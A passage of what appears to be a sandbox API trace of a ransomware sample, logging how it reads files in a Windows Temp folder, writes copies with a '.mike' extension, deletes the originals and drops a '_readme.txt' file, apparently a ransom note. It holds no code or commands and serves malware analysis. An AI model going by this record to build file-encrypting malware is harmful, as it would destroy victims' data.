dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.534] GetFileType (hFile=0x1d4) returned 0x1 [0147.534] GetFileType (hFile=0x1d4) returned 0x1 [0147.534] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0147.535] ReadFile (in: hFile=0x1d4, lpBuffer=0x22076d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22076d8*, lpNumberOfBytesRead=0x2af080*=0x369, lpOverlapped=0x0) returned 1 [0147.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.535] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.536] GetFileType (hFile=0x1d4) returned 0x1 [0147.536] GetFileType (hFile=0x1d4) returned 0x1 [0147.536] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0147.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.537] GetFileType (hFile=0x1d4) returned 0x1 [0147.537] GetFileType (hFile=0x1d4) returned 0x1 [0147.538] WriteFile (in: hFile=0x1d4, lpBuffer=0x220ebf0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x220ebf0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0147.538] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.539] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.539] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21346080, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21346080, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21392340, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xcd90)) returned 1 [0147.539] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.540] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2210260 | out: lpFileInformation=0x2210260*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21346080, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21346080, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21392340, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xcd90)) returned 1 [0147.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.540] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", dwFileAttributes=0x80) returned 1 [0147.541] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.541] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv")) returned 1 [0147.542] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.543] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0147.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d4 [0147.544] GetFileType (hFile=0x1d4) returned 0x1 [0147.545] GetFileType (hFile=0x1d4) returned 0x1 [0147.545] WriteFile (in: hFile=0x1d4, lpBuffer=0x2211e30*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x2211e30*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0147.546] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.546] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.547] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.547] GetFileType (hFile=0x1d4) returned 0x1 [0147.548] GetFileType (hFile=0x1d4) returned 0x1 [0147.548] CloseHandle (hObject=0x1d4) returned 1 [0147.548] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.548] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.548] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.549] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.549] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv"), fInfoLevelId=0x0, lpFileInformation=0x2214dd4 | out: lpFileInformation=0x2214dd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe704de50, ftCreationTime.dwHighDateTime=0x1d4c5b7, ftLastAccessTime.dwLowDateTime=0x8c38a5c0, ftLastAccessTime.dwHighDateTime=0x1d4ca89, ftLastWriteTime.dwLowDateTime=0x8c38a5c0, ftLastWriteTime.dwHighDateTime=0x1d4ca89, nFileSizeHigh=0x0, nFileSizeLow=0xb25f)) returned 1 [0147.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.549] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv"), fInfoLevelId=0x0, lpFileInformation=0x22150e8 | out: lpFileInformation=0x22150e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe704de50, ftCreationTime.dwHighDateTime=0x1d4c5b7, ftLastAccessTime.dwLowDateTime=0x8c38a5c0, ftLastAccessTime.dwHighDateTime=0x1d4ca89, ftLastWriteTime.dwLowDateTime=0x8c38a5c0, ftLastWriteTime.dwHighDateTime=0x1d4ca89, nFileSizeHigh=0x0, nFileSizeLow=0xb25f)) returned 1 [0147.550] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.550] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.550] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.552] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.552] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.552] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.553] GetFileType (hFile=0x1d4) returned 0x1 [0147.553] GetFileType (hFile=0x1d4) returned 0x1 [0147.553] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0147.554] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv"), fInfoLevelId=0x0, lpFileInformation=0x2215a18 | out: lpFileInformation=0x2215a18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe704de50, ftCreationTime.dwHighDateTime=0x1d4c5b7, ftLastAccessTime.dwLowDateTime=0x8c38a5c0, ftLastAccessTime.dwHighDateTime=0x1d4ca89, ftLastWriteTime.dwLowDateTime=0x8c38a5c0, ftLastWriteTime.dwHighDateTime=0x1d4ca89, nFileSizeHigh=0x0, nFileSizeLow=0xb25f)) returned 1 [0147.555] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.555] GetFileType (hFile=0x1d4) returned 0x1 [0147.555] GetFileType (hFile=0x1d4) returned 0x1 [0147.556] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0147.556] ReadFile (in: hFile=0x1d4, lpBuffer=0x2217038, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2217038*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.558] GetFileType (hFile=0x1d4) returned 0x1 [0147.558] GetFileType (hFile=0x1d4) returned 0x1 [0147.558] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0147.559] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.559] GetFileType (hFile=0x1d4) returned 0x1 [0147.559] GetFileType (hFile=0x1d4) returned 0x1 [0147.559] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0147.560] ReadFile (in: hFile=0x1d4, lpBuffer=0x2224000, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2224000*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.560] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.561] GetFileType (hFile=0x1d4) returned 0x1 [0147.561] GetFileType (hFile=0x1d4) returned 0x1 [0147.561] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0147.562] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.562] GetFileType (hFile=0x1d4) returned 0x1 [0147.562] GetFileType (hFile=0x1d4) returned 0x1 [0147.562] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0147.563] ReadFile (in: hFile=0x1d4, lpBuffer=0x2230fc8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2230fc8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.563] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.564] GetFileType (hFile=0x1d4) returned 0x1 [0147.564] GetFileType (hFile=0x1d4) returned 0x1 [0147.564] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0147.577] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 